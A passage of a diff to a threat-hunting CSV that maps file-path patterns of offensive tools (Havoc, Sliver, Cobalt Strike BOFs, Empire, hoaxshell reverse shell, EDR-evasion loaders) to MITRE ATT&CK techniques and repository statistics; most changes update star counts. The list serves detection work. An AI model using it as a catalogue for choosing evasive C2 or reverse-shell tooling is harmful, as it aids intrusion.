T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3768,22 +3787,22 @@ "*/HeapCrypt.git*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*/HellsGate.git*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*/Heroinn/*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/HInvoke.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*/hlldz*","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" -"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*/hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" -"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/hop.php*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/horizon3ai/*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*/hostenum.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3812,7 +3831,7 @@ "*/http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3859,7 +3878,7 @@ "*/http-lexmark-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/http-lfi.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-litespeed-sourcecode-download.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation 